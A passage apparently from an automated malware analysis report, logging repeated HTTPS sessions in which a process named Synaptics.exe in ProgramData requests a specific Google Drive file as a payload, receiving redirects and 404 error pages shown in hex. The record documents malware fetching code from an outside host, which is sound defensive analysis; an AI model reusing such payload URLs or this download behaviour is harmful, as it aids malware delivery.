                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    86192.168.2.452064142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:03 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:03 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-n7K4qDbBPY2mTzacEcqSzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    87192.168.2.452063142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:03 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:03 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-sW7ynnEes40cMD5LiC119Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    88192.168.2.452065142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:03 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:03 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7o8Gv7W5vY-DXGSko3N5l45cDkgmncZF_iXx4aAFW_i9skmV2YjZsdwNJf1AeyF91-
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:03 GMT
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-8A18mdk84OEKuKkxgfT4Uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:03 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:03 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 39 6e 4a 74 56 64 56 7a 69 75 35 4a 72 30 46 53 34 4a 58 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="o9nJtVdVziu5Jr0FS4JXNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:03 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    89192.168.2.452068142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:03 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:03 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7ehbSz27ueUWw1jhTJ0uODpHQe2tFBghLdcJQxPtUs4awq3-gSJU_C_iemQR5NreNr
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:03 GMT
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-doczwvqjkEEIj7b_bgHGQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:03 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:03 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 45 37 39 51 46 69 43 41 62 54 2d 63 79 65 77 6e 34 5f 68 59 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="gE79QFiCAbT-cyewn4_hYQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:03 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    90192.168.2.452080142.250.185.1934437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:04 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:04 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC66CP1O1x3bxiR5Nia8n1QJUBThuwpJfJcUuHqZhx45E7UEbHhTFD8cspGJIA8ahVdv
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:04 GMT
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Cl31Zh5YRl7eYY4elcSwlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:52:04 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                                    2024-12-30 10:52:04 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 36 34 50 63 6f 46 71 75 6a 37 69 6a 5a 49 31 65 41 35 70 69 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="064PcoFquj7ijZI1eA5piw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                                    2024-12-30 10:52:04 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    91192.168.2.452078142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:04 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:04 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Af4H-0HR6im1_4x4I2AG3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    92192.168.2.452077142.250.181.2384437924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:52:04 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                                                                                                                                                                                    2024-12-30 10:52:04 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:52:04 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
